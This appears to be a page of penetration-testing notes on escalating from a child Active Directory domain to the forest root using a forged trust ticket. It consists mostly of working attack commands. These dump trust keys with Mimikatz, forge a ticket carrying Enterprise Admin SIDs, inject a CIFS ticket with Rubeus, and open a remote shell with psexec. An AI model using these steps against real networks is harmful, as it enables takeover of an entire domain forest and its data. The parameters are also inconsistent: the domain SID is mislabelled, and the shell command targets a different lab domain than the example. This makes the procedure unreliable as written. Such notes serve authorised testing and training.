Child-to-Parent CIFS

For long version refer this article Refer Trusted- Vulnlab for example To get Domain SID:

lsadump::trust /patch

Then

Use the SID and rc4 hash:

Kerberos::golden 
/user: Administrator 
/domain: dollarcorp.moneycorp.local [child_domain]
/sid: DomainAdmin_SID [-512]
/sids: Enterprise_Admin_SID [519]
/rc4: Ticket HASH 
/service:krbtgt 
/target:moneycorp.local [root domain]
/ticket: location to save the ticket

Now use Rubeus to get TGS:

Rubeus.exe asktgs
/ticket: ticket Location
/service: service type [cifs/mcorpdc.moneycorp.local] 
/dc: domain controller [mcorp-dc.moneycorp.local] 
/ptt

Then to get shell:

psexec.py administrator@trusteddc.trusted.vl -k -no-pass

PreviousLateral Movement NextExtraSids

Last updated 2 months ago